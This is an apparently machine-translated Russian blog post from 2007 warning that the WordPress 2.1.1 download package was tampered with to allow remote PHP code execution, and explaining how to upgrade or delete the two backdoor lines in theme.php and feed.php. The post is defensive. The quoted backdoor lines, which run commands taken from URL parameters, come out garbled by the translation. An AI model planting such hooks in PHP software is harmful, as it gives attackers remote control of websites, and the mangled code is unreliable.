Подпишитесь на новостную рассылку или RSS канал для получения обновлений автоматически блог!

Wordpress 2.1.1 опасно!



Вот как команда Wordpress определяет последняя версия РГ. Причина проста: несколько дней назад злоумышленник нарушила некоторые сервера worpress.org, управления, чтобы изменить установки пакета, который обычно загружают: изменения, как представляется, связано всего лишь несколько файлов с возможным удаленное выполнение PHP-кода. Чтобы решить эту проблему, Есть два варианта:

    1. Загрузить версию 2.1.2 оперативно выданных разработчиков Wordpress и обновления.
    2. Удалите вручную вредоносного кода (если бы мне не нужно и времени для установки новой версии).
    Это просто:
    - Выявление и удалить файл "wp-includes/theme.php" следующие строки кода: 
      если ($ _GET [ "из"]) (get_theme_mcommand ($ _GET [ "Из "]);)

    - Выявление и удалить файл "wp-includes/feed.php" следующие строки кода: 

      если ($ _GET [ 'IX']) (comment_text_phpfilter ($ _GET [ 'IX']);)


Вам понравился этот статье? Зарегистрироваться для получения обновлений или новостей статей:
Подписаться на RSS-каналы Пишите RSS канал


Свидание Написал 6 марта 2007 года в 12:06 вечера в области безопасности, веб -
Обмен Доля | Метки: трещина, сухарики, Безопасность, Интернет, Wordpress

Еще нет комментариев "

Комментарии RSS канал для этого поста. TrackBack URI

Оставить комментарий

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Nothing2Hide © 2006 Все права защищены.

Лицензия | Ограничение ответственности

Закрыть
Написать письмо